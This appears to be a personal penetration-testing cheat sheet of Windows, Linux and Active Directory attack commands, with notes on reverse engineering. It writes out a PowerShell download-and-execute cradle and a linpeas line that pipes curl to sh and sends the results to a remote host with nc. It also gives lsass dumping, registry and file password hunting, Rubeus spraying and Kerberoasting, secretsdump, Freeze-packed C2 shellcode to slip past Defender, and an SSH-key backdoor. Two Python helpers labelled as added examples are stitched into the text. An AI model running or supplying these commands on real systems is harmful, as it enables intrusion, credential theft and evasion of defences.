Invoke-FindLocalAdminAccess     -   finds machines on the domain that the current user has local admin  access to
Invoke-FindLocalAdminAccessThreaded - threaded version of Invoke-FindLocalAdminAccess
Invoke-UserFieldSearch          -   searches a user field for a particular term
Invoke-ComputerFieldSearch      -   searches a computer field for a particular term
Invoke-FindVulnSystems          -   finds systems likely vulnerable to MS08-067
Invoke-HostEnum                 -   run all available enumeration checks on a single host
Invoke-EnumerateLocalAdmins     -   enumerates members of the local Administrators groups across all machines in the domain
Invoke-EnumerateLocalAdminsThreaded     -     threaded version of Invoke-EnumerateLocalAdmins
CTRL+shift+enter		- run as admin 

#windows enum

net user /domain - list all domain users
net user - list local users on the machine
net user <username> - details and group membership for a user
net localgroup <groupname> - members of a local group (e.g. net localgroup Administrators)
net accounts - password policy
hostname - find the host name
Copy a file from a share: copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
Identify stored credentials (opens Credential Manager): rundll32.exe keymgr.dll,KRShowKeyMgr
Search for files: Get-ChildItem C:\ -Recurse -Include "<search string>"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" - pick specific lines out of systeminfo
wmic qfe - list installed patches
wmic logicaldisk get caption,description,providername - list drives and mapped shares
whoami /groups - group memberships of the current user
whoami /priv - privileges of the current user
route print - routing table (use arp -a for the ARP table)
netstat -ano - listening ports and the PIDs that own them
sc query windefend - status of the Defender service
sc queryex type= service - list all services
netsh advfirewall firewall dump or netsh firewall show state - enumerate the Windows firewall
schtasks /query /fo LIST /v - look for scheduled tasks that run as a privileged user

#windows post exploitation
Download and run a PowerShell script in memory: IEX (New-Object Net.WebClient).DownloadString("http://<host>/<script>.ps1")
Save a file to disk instead: Invoke-WebRequest -Uri "http://<host>/<file>" -OutFile <file>
Search the web server configuration for credentials: C:\windows\system32\inetsrv> findstr /si password *.config *.xml

Cleartext passwords - search for them:
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files:
dir /s *pass* == *cred* == *vnc* == *.config

Find all passwords in all files:
findstr /spin "password" .

These are common files to find them in. They might be base64-encoded, so look out for that.

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

In Registry

VNC

reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

SNMP Paramters

reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

Putty

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Search for password in registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

#use procdump to dump lsass procdump.exe -ma lsass.exe

Windows Privesc

Source: https://pentest.coffee/active-directory-lateral-movement-and-post-exploitation-cheat-sheet-3170982a7055
RDP into windows from linux. xfreerdp /u:user /p:password /cert:ignore /v:MACHINE_IP

Registry Keys

Windows Credential Storage: Registry paths like HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets or HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services can hold saved credentials.
AutoLogin Keys: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (entries like DefaultUserName, DefaultPassword).
Legacy Software Keys: Older software might store credentials in various registry paths depending on the application.

AppLocker
Get-AppLockerPolicy -Effective -Xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-AppLockerPolicy -Effective; $a.RuleCollections

AppLocker rules applied to a host can also be read from the local registry at HKLM\Software\Policies\Microsoft\Windows\SrpV2.

Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods

You can use Freeze to load and execute your shellcode in a stealthy manner.

Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
2. ./Freeze -I demon.bin -encrypt -O demon.exe
3. Run the result; in the author's test at the time, Defender raised no alerts.

What you need - ATTACKING WINDOWS

DCSync - to fetch secrets through DCSync, the account needs two rights on the domain object: "Replicating Directory Changes" (DS-Replication-Get-Changes) and "Replicating Directory Changes All" (DS-Replication-Get-Changes-All).

Bypassing AV

Obfuscation and Encoding: Common payloads can often be detected by AV software based on their signatures. By obfuscating the payload or encoding it in a way that it is not recognized as malicious until execution, it's possible to evade AV detection.

Packing and Crypting: Packing and crypting the payload can also help to avoid detection. There are various packers and crypters available that can compress or encrypt the executable, making it difficult for AV to analyze.

Living Off the Land (LotL) and LOLBAS: Using built-in system tools and scripts to conduct operations can often bypass AV since these tools are typically trusted by the operating system. This includes using PowerShell, WMI, and other administrative tools that are less likely to be flagged by AV software.

Fileless Attacks: Conducting attacks that do not rely on files and instead execute directly in memory can bypass traditional file scanning by AV solutions.

Polymorphic and Metamorphic Malware: These types of malware change their code as they spread, making it difficult for AVs to recognize them using traditional signature-based detection methods.

Timing-Based Evasion: Some penetration testers find success by timing the execution of their payloads to avoid detection, such as when AV software may be updating or scanning other parts of the system.

Trusted and Signed Binaries: Using binaries that are signed with a trusted certificate can sometimes allow code to execute without being inspected closely by the AV, as the software may trust signed code more than unsigned.

Research and Testing: Continuously researching the latest AV evasion techniques and testing them in a controlled environment to see what works against current AV engines.

Bypassing EDR

Behavioral Evasion: Since EDR systems often use behavioral analysis to detect malicious activity, one approach is to mimic normal user behavior to avoid triggering alerts.
Misconfiguration Exploitation: EDR systems can sometimes be misconfigured. During an authorized test, security professionals may seek to identify and exploit these misconfigurations to bypass the EDR.
Process Injection: Injecting malicious code into legitimate processes can sometimes bypass EDR monitoring, as the process itself is usually trusted.
Process Hollowing: This involves creating a new process in a suspended state, removing its memory, and replacing it with malicious code. When the process resumes, it may bypass the EDR as it appears as a legitimate process.
Direct System Calls: Invoking system calls directly, rather than using the higher-level API functions that EDRs monitor, can sometimes evade detection.
Rootkits: Advanced rootkits can operate at a low level on a computer system, potentially allowing them to evade EDR systems by hiding their presence.
Memory Exploits: Exploiting vulnerabilities that allow for the execution of code directly in memory can sometimes bypass the file-based monitoring of EDR systems.
Custom Malware: Creating unique malware that hasn't been encountered by an EDR can be a way to bypass its signatures and heuristics.
Tool and Script Modification: Modifying existing tools and scripts to alter their behavior or obfuscate their intent can help in evading EDRs that are signature-based.
Encryption and Obfuscation: Encrypting or obfuscating command and control communication can bypass network-based detection mechanisms of EDR systems.
Decoy Processes: Creating decoy processes can distract the EDR system while the actual malicious process runs undetected.
Living Off the Land (LotL) Techniques: Using built-in system tools to carry out attacks can avoid detection as these tools are usually whitelisted by EDR systems.
Timestomping: Modifying timestamps of files to evade detection based on the time of creation or modification.


linux commands and tools

Start an SMB server "sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali ."

scp important.txt [email protected]:/home/ubuntu/transferred.txt

wget http://127.0.0.1:8000/file

Find a file -- find . -name thisfile.txt

Discard error output: append 2>/dev/null to a command.

ipconfig /all (Windows; the Linux equivalents are ip a or ifconfig)

ls -lah 

FIND is for searching files and directories using filters 

sudo -l List the programs which sudo allows your user to run


id command in Linux is used to find out user and group names and numeric ID’s (UID or group ID) of the current user or any other user in the server. This command is useful to find out the following information as listed below:

	User name and real user id.
	Find out the specific Users UID.
	Show the UID and all groups associated with a user.
	List out all the groups a user belongs to.
	Display security context of the current user.

head/tail - print the first or last 10 lines of a file. -n can be used to show a specific number of lines.

linux enumeration

Identify kernel version - uname -a OR cat /proc/version OR cat /etc/issue

linux post exploitation

The chmod command is used to change the access mode of a file.

| Option | Description |
| --- | --- |
| `-R` | Apply the permission change recursively to all files and directories within the specified directory. |
| `-v` | Display a message for each file processed, indicating the permission change that was made. |
| `-c` | Like `-v`, but only report files whose permissions actually changed. |
| `-f` | Suppress error messages. |
| `-h` | Change the permissions of symbolic links instead of the files they point to. |

| Operator | Definition |
| --- | --- |
| `+` | Add permissions |
| `-` | Remove permissions |
| `=` | Set the permissions to the specified values |

The following letters can be used in symbolic mode:

| Letter | Definition |
| --- | --- |
| `r` | Read permission |
| `w` | Write permission |
| `x` | Execute permission |

The following references are used:

| Reference | Class |
| --- | --- |
| `u` | Owner |
| `g` | Group |
| `o` | Others |
| `a` | All (owner, group, others) |


John the ripper 
	john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Generate a new password hash with a password of your choice:
	mkpasswd -m sha-512 newpasswordhere
manual ping sweep - for i in $(seq 254); do ping 10.0.0.${i} -c1 -W1 & done | grep from

grep

Find strings that look like IP addresses: grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' ips.txt

	-B N  show N lines before the keyword
	-A N  show N lines after the keyword
	-C N  show N lines before and after the keyword

VI

:w	writes the contents of the work buffer to the file
:q	quit
:q!	quit without saving changes
ZZ	save and quit
:wq	save and quit
:w filename	saves to filename (allows you to change the name of the file)
i 	insert text before cursor 
esc 	quit text edit

linux Paths

exploitdb - /usr/share/exploitdb
wordlists - /usr/share/wordlists
ssh config - /etc/ssh/sshd_config

Windows Tools

lsass - mimikatz 
lsass - nanodump 

Active Directory Tools

Bloodhound 

Active directory

Kerbrute - Enumerate users on a domain: ./kerbrute_linux_amd64 userenum --dc 10.10.251.86 -d spookysec.local /home/jon/Desktop/attacktivedirectory_usrlist
Rubeus - see the Rubeus section below.

Rubeus

Rubeus is a powerful tool for attacking Kerberos: brute-forcing / password spraying and harvesting tickets.

Before password spraying with Rubeus, you need to add the domain controller's name to the Windows hosts file. You can add the IP and domain name to the hosts file from the machine by using the echo command: echo 10.10.251.247 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts

Password spray attack: Rubeus.exe brute /password:Password1 /noticket
Kerberoast command: Rubeus.exe kerberoast
Harvest TGTs (ticket granting tickets) every 30 seconds: Rubeus.exe harvest /interval:30

AS-REP Roasting dumps the Kerberos AS-REP (krb5asrep) hashes of user accounts that have Kerberos pre-authentication disabled. Unlike Kerberoasting, these users do not have to be service accounts; the only requirement for AS-REP roasting a user is that pre-authentication is disabled on the account.

SMBclient - enumerate SMB shares: smbclient -L 10.10.9.47 -U '' (press Enter at the password prompt for a null session)

crackmapexec - see if we have access to shares: crackmapexec smb 10.10.9.47 -u guest -p "" --shares
Don't forget the CrackMapExec modules: -M spider_plus walks the share directories.

Enum4linux - enumerates users, shares and groups from Windows/Samba hosts over SMB. Can be used against Active Directory: enum4linux -a TARGET. Pipe through | tee "file name" to export to a file.

SMBclient - connect to shares (HOST and SHARE are placeholders):
	smbclient -U '%' -N \\\\HOST\\SHARE    # null session to connect to a Windows share
	smbclient -U '' \\\\HOST\\SHARE        # authenticated session to connect to a Windows share (you will be prompted for a password)

MSFCONSOLE

Scan SMB version: auxiliary/scanner/smb/smb_version. Brute-force or password-spray AD: auxiliary/scanner/smb/smb_login

SMBclient - to list file shares: smbclient -L \\...\ ; to move into a directory, append the directory name after the “\”. Finding the IP for * in Windows: https://networking.grok.lsu.edu/article.aspx?articleid=14842

AD Attack Privilege Requirements

- Kerbrute Enumeration - No domain access required
- Pass the Ticket - Access as a user to the domain required
- Kerberoasting - Access as any user required
- AS-REP Roasting - Access as any user required
- Golden Ticket - Full domain compromise (domain admin) required
- Silver Ticket - Service hash required
- Skeleton Key - Full domain compromise (domain admin) required

Definitions 

Kerberos is the default authentication service for Microsoft Windows domains. Use enum4linux to enumerate active ports 135/445.

Use secretsdump.py to retrieve all of the password hashes that this user account has access to, for example: python3 secretsdump.py spookysec.local/backup:[email protected] -just-dc-user Administrator

Attacking Active Directory

Use Kerbrute to Identify usernames associated with active directory domain.

Use Smb Client to enumerate SMB ports 139/445 using crackmapexec, smbclient and smbmap

Use Crackmap to determine access to shares Dont forget to use modules . module -M spider_plus

If access is gained to a user account Rubeus can be used to harvest and bruteforce tickets.

Impacket can also be used to Kerberoast using GetUserSPNs.py (this file is located in the /examples folder in impacket)

Source: https://safe.menlosecurity.com/https://pentest.coffee/active-directory-cheat-sheet-94e0bb9bed2

Persistence

Backdooring SSH: add an SSH key into the ~/.ssh folder.

Run ssh-keygen, write the content of ~/.ssh/id_rsa.pub into ~/.ssh/authorized_keys, and set the right permissions: 700 for ~/.ssh and 600 for authorized_keys.

chmod u+s could be used by a higher-level user to grant an arbitrary command or file higher privileges. Then

cronjob


To create a new cron job, run the following command in the terminal which edits the crontab file:

crontab -e

You can stop a single cron job by removing its line from the crontab file: run crontab -e and delete the line for the specific task. Alternatively, comment the job out in the crontab file.

Example: 44 3 * * * echo "hello world" > hello.txt

In this example the value for minute is 44 and the value for hour is 3. The * sign means always: * in the day field means every day, * in the month field means every month, and * in the weekday field means the job runs every day from Sunday to Saturday.

The sixth field is the actual job or command to be executed at the scheduled time. In this example, the command is echo "hello world" > hello.txt.

cat /etc/crontab
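An added example (not from the original notes) that applies the five-field syntax explained above: it expands each field (including lists, ranges and */step values), handles the user column that /etc/crontab has and a user crontab lacks, and reports whether and when a line fires, so entries found while reviewing crontabs can be read precisely. The sample lines are constructed.

```python
"""Cron schedule parser: expands crontab time fields and evaluates firing times."""
import re
from datetime import datetime, timedelta

# Field order with allowed ranges; weekday 0 and 7 both mean Sunday.
FIELDS = (("minute", 0, 59), ("hour", 0, 23), ("day", 1, 31),
          ("month", 1, 12), ("weekday", 0, 7))


def expand_field(spec, low, high):
    """Expand one cron field ('*', '5', '1-5', '*/15', '1,30-40/5') into a set of ints."""
    values = set()
    for part in spec.split(","):
        m = re.fullmatch(r"(\*|\d+(?:-\d+)?)(?:/(\d+))?", part)
        if not m:
            raise ValueError(f"bad cron field {part!r}")
        rng, step = m.group(1), int(m.group(2) or 1)
        if rng == "*":
            start, stop = low, high
        elif "-" in rng:
            start, stop = (int(x) for x in rng.split("-"))
        else:
            start = int(rng)
            stop = high if step > 1 else start   # '5/10' = from 5 to the top, every 10
        if step < 1 or not (low <= start <= stop <= high):
            raise ValueError(f"cron field out of range {part!r}")
        values.update(range(start, stop + 1, step))
    if (low, high) == (0, 7):                      # normalise Sunday=7 to 0
        values = {0 if v == 7 else v for v in values}
    return values


def parse_crontab_line(line, system=False):
    """Split a crontab line into (schedule, user, command).

    system=True parses /etc/crontab format, which has a user field between the
    time fields and the command; user crontabs (crontab -e) have no user field."""
    n_fixed = 6 if system else 5
    parts = line.strip().split(None, n_fixed)
    if len(parts) < n_fixed + 1:
        raise ValueError("crontab line is missing time fields or a command")
    schedule = {name: expand_field(spec, low, high)
                for (name, low, high), spec in zip(FIELDS, parts[:5])}
    # Vixie cron: a day/weekday field counts as restricted unless it starts with '*'.
    schedule["day_restricted"] = not parts[2].startswith("*")
    schedule["weekday_restricted"] = not parts[4].startswith("*")
    user = parts[5] if system else None
    return schedule, user, parts[n_fixed]


def matches(schedule, when):
    """True if datetime `when` is a firing time of the schedule.

    When both day-of-month and weekday are restricted, cron fires if EITHER
    matches; otherwise both must match."""
    if not (when.minute in schedule["minute"] and when.hour in schedule["hour"]
            and when.month in schedule["month"]):
        return False
    day_ok = when.day in schedule["day"]
    wday_ok = (when.isoweekday() % 7) in schedule["weekday"]   # Sunday -> 0
    if schedule["day_restricted"] and schedule["weekday_restricted"]:
        return day_ok or wday_ok
    return day_ok and wday_ok


def next_run(schedule, after, limit_days=366):
    """First firing time strictly after `after`, scanning minute by minute."""
    t = after.replace(second=0, microsecond=0) + timedelta(minutes=1)
    end = after + timedelta(days=limit_days)
    while t <= end:
        if matches(schedule, t):
            return t
        t += timedelta(minutes=1)
    return None


if __name__ == "__main__":
    # Constructed sample lines: the one from the notes above and an /etc/crontab-style entry.
    sched, _, cmd = parse_crontab_line('44 3 * * * echo "hello world" > hello.txt')
    print(cmd, "next fires at", next_run(sched, datetime(2024, 10, 21, 3, 0)))
    sched, user, cmd = parse_crontab_line("*/15 * * * * root /usr/local/bin/backup.sh", system=True)
    print(user, "runs", cmd, "at minutes", sorted(sched["minute"]))
```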

Linpeas

Execute from memory and send the output back to the host:

	nc -lvnp 9002 | tee linpeas.out                              # host
	curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002   # victim

If you have a firmware image and you want to analyze it with linpeas to search for passwords or badly configured permissions, you have two main options.

If you can emulate the firmware, run linpeas inside it (assuming the firmware filesystem is mounted at /mnt):

	cp /path/to/linpeas.sh /mnt/linpeas.sh
	chroot /mnt
	bash /linpeas.sh -o software_information,interesting_files,api_keys_regex

If you cannot emulate the firmware, use the -f </path/to/folder> parameter to point at the folder containing the files you want to analyze:

	bash /path/to/linpeas.sh -f /path/to/folder

linux file permissions

-rw-r--r-- 12 linuxize users 12.0K Apr  8 20:51 filename.txt
|[-][-][-]-   [------] [---]
| |  |  | |      |       |
| |  |  | |      |       +-----------> 7. Group
| |  |  | |      +-------------------> 6. Owner
| |  |  | +--------------------------> 5. Alternate Access Method
| |  |  +----------------------------> 4. Others Permissions
| |  +-------------------------------> 3. Group Permissions
| +----------------------------------> 2. Owner Permissions
+------------------------------------> 1. File Type

https://linuxize.com/post/chmod-command-in-linux/
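An added example (not from the original notes or the linked article) that works through the chmod symbolic syntax and the ls -l permission layout above: it converts a permission string such as rwsr-xr-x to its numeric mode, applies symbolic clauses like u+s or go-w to a mode so the effect of a command can be predicted, and flags setuid/setgid and world-writable entries in ls -l output. The ls -l lines it parses are constructed; the umask and directory-specific behaviour of real chmod are not modelled.

```python
"""Unix permission helpers: parse ls -l mode strings and apply chmod symbolic modes."""
import re
import stat

RWX = {"r": 4, "w": 2, "x": 1}
SHIFT = {"u": 6, "g": 3, "o": 0}        # bit offset of each class within the mode


def parse_mode(perm):
    """Convert the 9-character permission field of ls -l (e.g. 'rwsr-xr-x') to an int mode."""
    if len(perm) != 9:
        raise ValueError("expected exactly 9 permission characters")
    mode = 0
    for i, ch in enumerate(perm):
        triple, pos = divmod(i, 3)          # triple 0/1/2 = owner/group/others
        shift = 6 - 3 * triple
        if ch == "-":
            continue
        if ch == "rwx"[pos]:
            mode |= (4 >> pos) << shift
        elif pos == 2 and ch in ("s", "S") and triple < 2:
            mode |= stat.S_ISUID if triple == 0 else stat.S_ISGID
            mode |= (1 << shift) if ch == "s" else 0   # lowercase = also executable
        elif pos == 2 and ch in ("t", "T") and triple == 2:
            mode |= stat.S_ISVTX | ((1 << shift) if ch == "t" else 0)
        else:
            raise ValueError(f"unexpected {ch!r} at position {i}")
    return mode


def apply_symbolic(mode, expr):
    """Apply chmod symbolic clauses ('u+s', 'go-w', 'a=rx', 'u+x,g-w') to a numeric mode.

    A missing class list is treated as 'a' (real chmod would also honour the umask);
    '=' clears the selected classes' rwx bits and their setuid/setgid bit first."""
    for clause in expr.split(","):
        m = re.fullmatch(r"([ugoa]*)([+=-])([rwxst]*)", clause)
        if not m:
            raise ValueError(f"bad symbolic mode {clause!r}")
        who, op, perms = m.groups()
        classes = "ugo" if (not who or "a" in who) else who
        bits = clear = 0
        for c in classes:
            clear |= 7 << SHIFT[c]
            if c == "u":
                clear |= stat.S_ISUID
            elif c == "g":
                clear |= stat.S_ISGID
            for p in perms:
                if p in RWX:
                    bits |= RWX[p] << SHIFT[c]
                elif p == "s" and c == "u":
                    bits |= stat.S_ISUID
                elif p == "s" and c == "g":
                    bits |= stat.S_ISGID
                elif p == "t":
                    bits |= stat.S_ISVTX
        if op == "+":
            mode |= bits
        elif op == "-":
            mode &= ~bits
        else:
            mode = (mode & ~clear) | bits
    return mode


def classify_ls_line(line):
    """Parse one ls -l line and flag risky permission bits.

    Returns {'name', 'mode', 'flags'}; a trailing '+', '.' or '@' on the first
    token (the alternate access method marker) is ignored."""
    fields = line.split(None, 8)
    if len(fields) < 9:
        raise ValueError("not an ls -l line")
    ftype, perm, name = fields[0][0], fields[0][1:10], fields[8]
    mode = parse_mode(perm)
    flags = []
    if mode & stat.S_ISUID:
        flags.append("setuid")
    if mode & stat.S_ISGID:
        flags.append("setgid")
    if mode & stat.S_IWOTH and not (ftype == "d" and mode & stat.S_ISVTX):
        flags.append("world-writable")      # sticky directories like /tmp are expected
    return {"name": name, "mode": oct(mode), "flags": flags}


if __name__ == "__main__":
    # Constructed ls -l lines, not real system output.
    for sample in ("-rwsr-xr-x 1 root root 55528 Apr  8 20:51 /usr/bin/passwd",
                   "-rw-rw-rw- 1 linuxize users 12 Apr  8 20:51 notes.txt"):
        print(classify_ls_line(sample))
    print(oct(apply_symbolic(0o644, "u+s")))   # what 'chmod u+s' does to a 644 file
```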

Getting Processes/Services to Start on Boot

Some applications can be started on the boot of the system that we own. For example, web servers, database servers or file transfer servers. This software is often critical and is often told to start during the boot-up of the system by administrators.

Enter the use of systemctl -- this command allows us to interact with the systemd process/daemon. Continuing on with our example, systemctl is an easy to use command that takes the following formatting: systemctl [option] [service]

Start
Stop
Enable
Disable

For example, running echo "Hi THM" normally returns the output to us straight away. After adding the & operator to the command (echo "Hi THM" &), we're instead just given the ID of the echo process rather than the actual output, because the command is running in the background.

Access Permission Testing

Check the access permissions of your users and in case your web application provides role-based access, then ensure users are getting access only to those parts of the web application to which they have the right. Nothing more or less.

User Session Testing This is very important. Ensure that user sessions end upon log off. Because if they don’t, that valid session can be easily hijacked by hackers – this process is known as session hijacking – for carrying out malicious activity.

Brute Force Attack Testing Using appropriate testing tools, ensure your web application stays safe against brute force attacks.

DoS (Denial of Service) Attack Testing Also ensure your web application stays safe against DoS (Denial of Service) attacks by using appropriate testing tools.

Directory Browsing Ensure directory browsing is disabled on the web server which hosts your web application. Because if you don’t, you’ll be giving hackers easy access to your restricted files.

Upgrade shell

python -c 'import pty;pty.spawn("/bin/bash")'

Web app tactics

Add an additional URL as a get parameter in a website
	http://example.com/?destination=https://google.com
	Source - https://www.youtube.com/watch?v=jwBRgaIRdgs

“<!--” denotes the beginning of a comment in an html page 

Inputting a link into a user field
	To input a malicious link into a prompt:
<a href="url">link text</a>

Iphone Hacking

jailbreaking
	palera1n - https://palera.in/ - needs an actual Lightning to USB cable.

	frida

Reverse engineering

ghidra - https://www.youtube.com/watch?v=d4Pgi5XML8E

In reverse engineering, particularly when analyzing assembly code, you come across a variety of instructions, directives, and codes. Here is a categorized list of commonly encountered terms and instructions across different architectures (x86, ARM, MIPS, etc.):

General Assembly Instructions

Data Transfer
- mov (move data)
- lea (load effective address)
- ldr (load register, ARM)
- str (store register, ARM)
- ld / st (load/store, RISC architectures)

Arithmetic Operations
- add, sub (addition, subtraction)
- mul, imul (multiplication)
- div, idiv (division)
- inc, dec (increment, decrement)

Bitwise Operations
- and, or, xor (bitwise AND, OR, XOR)
- not (bitwise NOT)
- shl, shr (shift left, shift right)
- rol, ror (rotate left, rotate right)

Control Flow
- jmp (jump)
- call (function call)
- ret (return from function)
- je, jne (jump if equal/not equal)
- jg, jge, jl, jle (jump based on comparison)

Stack Operations
- push, pop (push to/pop from stack)
- call, ret (function call/return)
- leave (clean up the stack frame)

Comparison
- cmp (compare)
- test (bitwise test)

Floating-Point Operations
- fld, fst (load/store floating-point value)
- fadd, fsub, fmul, fdiv (floating-point arithmetic)

ARM-Specific Instructions

Branch Instructions
- b (branch)
- bl (branch with link, i.e., function call)
- bx (branch to address in register)
- blx (branch with link and exchange)

Load and Store
- ldr, str (load/store)
- ldrb, strb (load/store byte)
- ldrh, strh (load/store halfword)

Condition Codes
- eq, ne, gt, lt, ge, le (equal, not equal, etc.), appended to instructions: moveq, addne, etc.

Special Operations
- svc (supervisor call, ARM syscall)
- mrs, msr (move to/from system registers)

MIPS-Specific Instructions

Load/Store
- lw (load word)
- sw (store word)
- lb, sb (load/store byte)

Arithmetic
- add, sub
- mult, div

Branching
- beq (branch if equal)
- bne (branch if not equal)
- j, jal (jump, jump and link)

Logical
- and, or, xor, nor

Control Flow and References

Cross-References
- xref (cross-reference in tools like IDA Pro, Ghidra)
- jmpl (jump and link)

Directives
- .data, .text (section markers)
- .globl (global symbol)
- .align (memory alignment)

System Instructions
- syscall (system call in x86)
- int 0x80 (Linux system call interrupt)
- hlt (halt the CPU)

Exceptions and Interrupts
- int (interrupt)
- iret (interrupt return)

Pseudocode Constructs in Tools

Reverse engineering tools like IDA Pro or Ghidra abstract low-level assembly into higher-level pseudocode. Common constructs include:
- CALL (function calls)
- IF, ELSE, WHILE, FOR (control structures)
- Variable references (e.g., var_4, local_8)

Miscellaneous

NOP (No Operation)
- nop (used for alignment or delay)

Flags and Conditions
- Instructions affecting flags: add, sub, cmp, etc.
- Conditional jumps depend on flags (e.g., Zero, Carry, Overflow).

Debugging and Markers
- trap (debugging breakpoint)
- db, dw, dd (define byte, word, doubleword)

This list covers a wide spectrum of instructions and references used in reverse engineering across different architectures. Tools like Ghidra, IDA Pro, or Binary Ninja often add their own abstractions to make analysis easier. If you're working on a specific architecture, focusing on its instruction set will be most beneficial.

In the context of reverse engineering software, an array is a data structure that stores a collection of elements (usually of the same type) in contiguous memory locations. Arrays are common in programming, and reverse engineers encounter them frequently while analyzing compiled binaries or source code. Understanding arrays in this context is crucial for tasks such as debugging, decompilation, and understanding program behavior.

Characteristics of Arrays in Reverse Engineering: Contiguous Memory: Arrays are stored in a block of contiguous memory, which means the elements are laid out sequentially. This property helps reverse engineers identify arrays in memory dumps or disassembled code.

Indexing: Each element in an array is accessible by its index, which is often a fixed offset from the base address of the array. In assembly, this is frequently observed as pointer arithmetic or index-based access.

Size: Arrays have a fixed size in memory, determined at compile time or runtime. The size can sometimes be inferred from the surrounding code or data structure definitions.

Type Information: In statically typed languages, all elements in an array are of the same data type. Reverse engineers use this to deduce data types based on the operations performed on the array elements.

Common Uses: arrays in software can hold:

- Data structures (e.g., strings, buffers).
- Tables or lookup data (e.g., encryption keys, color palettes).
- Runtime variables like stacks or matrices.

Indicators of Arrays in Disassembled Code:

- Sequential Access: look for loops that iterate over contiguous memory. Instructions like MOV, ADD, SUB, or LEA that access memory locations sequentially often point to array usage.
- Pointer Arithmetic: code performing arithmetic on pointers (e.g., base_address + index * element_size) suggests array indexing.
- Initialization Patterns: recognizable patterns of initializing memory with regular offsets often imply an array.
- Debug Symbols: in some binaries, debug symbols or metadata can provide direct information about array structures.
- Strings: null-terminated character arrays (char[]) are common for strings, identifiable by their null byte (0x00) terminator.

Challenges in Reverse Engineering Arrays:

- Dynamic Allocation: arrays allocated dynamically (e.g., using malloc or new) are harder to identify without detailed analysis of the heap.
- Unknown Types: if type information is stripped from the binary, reverse engineers must deduce types through usage patterns.
- Multidimensional Arrays: these add complexity, as they involve nested indexing.

Understanding arrays and their behavior in a program is often a crucial step in reverse engineering, as they frequently hold critical data or contribute to the functionality of the software being analyzed.

Vocabulary words commonly used in software reverse engineering, with their definitions:

General Terms:

- Disassembler: A tool that converts machine code into assembly language, enabling reverse engineers to analyze executable binaries.
- Decompiler: A tool that attempts to reconstruct high-level source code (e.g., C, C++) from compiled binaries.
- Debugger: A tool that allows the user to execute a program step-by-step, inspect memory, and analyze its runtime behavior.
- Binary: A compiled, machine-readable version of a program.
- Instruction Set Architecture (ISA): A specification of the set of operations, instructions, and formats supported by a processor (e.g., x86, ARM).
- Opcode: The part of a machine code instruction that specifies the operation to be performed.
- Dynamic Analysis: The process of analyzing a program's behavior during execution.
- Static Analysis: Analyzing a program without executing it, usually through disassembly or decompilation.
- Control Flow Graph (CFG): A representation of all possible paths of execution through a program.
- Intermediate Representation (IR): A simplified, lower-level representation of code used in reverse engineering and compiler design for easier analysis.

Memory and Data:

- Stack: A memory structure used for managing function calls and local variables. Grows and shrinks during program execution.
- Heap: A region of memory used for dynamic allocation during runtime.
- Registers: Small, fast storage locations within a CPU that hold data or addresses being used during execution.
- Pointer: A variable that holds a memory address, commonly used for referencing data in arrays, structures, or functions.
- Buffer Overflow: A software vulnerability where data exceeds a buffer's boundary, potentially allowing execution of arbitrary code.

Code Behavior:

- Function Prologue/Epilogue: The setup and cleanup instructions executed at the beginning and end of a function, respectively.
- Hooking: Intercepting function calls, messages, or events to alter or monitor a program's behavior.
- Obfuscation: Techniques used to make code harder to understand or reverse-engineer, such as renaming variables to meaningless names or inserting junk instructions.
- Packing: Compressing and/or encrypting an executable to hide its true contents and behavior.
- Shellcode: A small piece of code used as a payload in exploits, often written in assembly and designed for execution in vulnerable software.
- Sandboxing: Running a program in a restricted environment to analyze its behavior safely, often used for malware analysis.
- Inline Assembly: Assembly instructions written directly within high-level source code.

Tools and Techniques:

- Hex Editor: A tool for examining and editing the raw binary contents of a file.
- Signature: A pattern or sequence used to identify functions, libraries, or malicious code.
- Breakpoint: A deliberate pause in program execution during debugging, used to inspect the state of the program.
- Fuzzing: An automated technique for finding vulnerabilities by providing unexpected or random inputs to a program.
- Symbol Table: A data structure used in binaries to map variable and function names to their addresses.

Security and Malware:

- Ransomware: Malicious software that encrypts files and demands payment for their decryption.
- Trojan Horse: Malicious software disguised as legitimate to trick users into installing or executing it.
- Reverse Shell: A connection initiated by a compromised machine to a remote attacker, giving them control over the system.
- Polymorphic Code: Code that changes its structure each time it runs to evade detection, commonly seen in malware.
- Anti-Reverse Engineering: Techniques used to detect and thwart reverse engineering efforts, such as debugger detection or encrypted code.
- Exploit: A piece of software or code that takes advantage of a vulnerability to perform unintended or malicious actions.

Concepts and Representations:

- Relocation Table: A section in a binary that allows the program loader to adjust memory addresses used by the executable.
- Symbolic Execution: Analyzing a program by following symbolic rather than concrete values to explore multiple execution paths.
- Endianness: The order in which bytes are arranged in memory, such as little-endian or big-endian.
- Instruction Pipeline: A mechanism in CPUs that allows multiple instructions to be processed simultaneously at different stages of execution.
- Thunk: A small piece of code that redirects execution, often used for function interposition or lazy loading.
- Dead Code: Instructions or code segments that are never executed but might be used to confuse reverse engineers.

Nmap

